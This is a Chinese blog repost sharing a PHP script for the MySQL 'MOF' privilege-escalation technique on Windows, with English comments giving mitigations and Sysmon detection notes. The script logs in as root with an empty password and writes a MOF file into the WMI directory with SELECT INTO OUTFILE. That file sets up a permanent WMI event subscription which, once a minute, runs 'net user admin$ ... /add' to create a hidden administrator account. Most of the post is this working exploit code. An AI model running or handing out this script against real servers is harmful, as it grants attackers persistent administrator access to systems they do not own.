之前本人的博客发过perl,python版的提权,这里再发一个php版,大家拿去研究一下。也是转的。

其它版本请看下面的链接:

http://back.waitalone.cn/post/MySQL_Remote_Poc.html


http://back.waitalone.cn/post/MySQL_Python_priv.html

http://www.linux520.com/bbs/viewthread.php?tid=9432

代码如下:

<?php
// Demonstration of the MySQL "MOF" local privilege-escalation technique on Windows.
// Precondition: a MySQL account with the FILE privilege on a server running on a
// Windows host where the MySQL service account can write into the WMI MOF
// directory. The script writes a MOF file there with SELECT ... INTO OUTFILE; on
// affected Windows versions WMI auto-compiles files dropped in that directory and
// registers the permanent event subscription it describes, whose consumer then
// runs $cmdshell with the WMI service's privileges (privilege level is not shown
// here — TODO confirm for the target OS version).
//
// Defensive notes:
//  - secure_file_priv (set to a restricted directory or empty) blocks INTO OUTFILE
//    writes outside that directory; do not grant FILE to application accounts and
//    do not run mysqld as LocalSystem/Administrator.
//  - Detection: file creation under %SystemRoot%\system32\wbem\mof\, and creation of
//    __EventFilter / ActiveScriptEventConsumer / __FilterToConsumerBinding objects
//    in root\subscription (Sysmon event IDs 19, 20 and 21 cover these).
//  - mysql_connect()/mysql_query() belong to the ext/mysql extension, deprecated
//    in PHP 5.5 and removed in PHP 7.0; this script only runs on legacy PHP.

// Hard-coded connection parameters: root with an empty password on localhost.
$mysql_server_name='localhost';
$mysql_username='root';
$mysql_password='';
$mysql_database='mysql';
// NOTE(review): the 4th parameter of mysql_connect() is $new_link (a boolean), not a
// database name; $mysql_database is merely coerced to true here. The database is
// actually selected below via mysql_select_db().
$conn=mysql_connect($mysql_server_name,$mysql_username,$mysql_password,$mysql_database);
// Command executed by the WMI consumer (interpolated into the JScript below).
// "admin$" is not a PHP variable because the "$" is followed by a space.
$cmdshell="net user admin$ qwe!@#123qwe /add";
// MOF source for a permanent WMI event subscription in root\subscription.
// The string is a PHP double-quoted literal: "\$EventFilter" / "\$Consumer" keep
// the MOF alias names literal, and the long backslash runs unwind first through
// PHP, then through the MOF parser (and, for ScriptText, through JScript).
// Do not reformat this literal — every escape level is load-bearing.
//  - __EventFilter: WQL query on __InstanceModificationEvent for Win32_LocalTime
//    where Second = 5, i.e. the filter fires once a minute.
//  - ActiveScriptEventConsumer: JScript that calls WScript.Shell.run($cmdshell).
//  - __FilterToConsumerBinding: wires the two together.
$payload = "#pragma namespace(\"\\\\\\\\.\\\\root\\\\subscription\")

instance of __EventFilter as \$EventFilter
{
EventNamespace = \"Root\\\\Cimv2\";
Name = \"filtP2\";
Query = \"Select * From __InstanceModificationEvent \"
\"Where TargetInstance Isa \\\"Win32_LocalTime\\\" \"
\"And TargetInstance.Second = 5\";
QueryLanguage = \"WQL\";
};

instance of ActiveScriptEventConsumer as \$Consumer
{
Name = \"consPCSV2\";
ScriptingEngine = \"JScript\";
ScriptText =
\"var WSH = new ActiveXObject(\\\"WScript.Shell\\\")\\nWSH.run(\\\"$cmdshell\\\")\";
};

instance of __FilterToConsumerBinding
{
Consumer = \$Consumer;
Filter = \$EventFilter;
};";
mysql_select_db($mysql_database,$conn);
// SELECT ... INTO OUTFILE writes $payload to the WMI MOF directory. Requires the
// FILE privilege; refused when secure_file_priv does not permit that path.
// $payload is embedded unescaped, so the statement depends on the literal
// containing no unescaped single quotes.
$sql="select '$payload' into outfile 'c:/windows/system32/wbem/mof/nullevt.mof';";
// The return value is never checked, so a failed write (missing privilege,
// secure_file_priv, existing file — INTO OUTFILE never overwrites) goes unnoticed.
$result=mysql_query($sql);
mysql_close($conn);
?>

 

原文地址:http://lcx.cc/?i=3197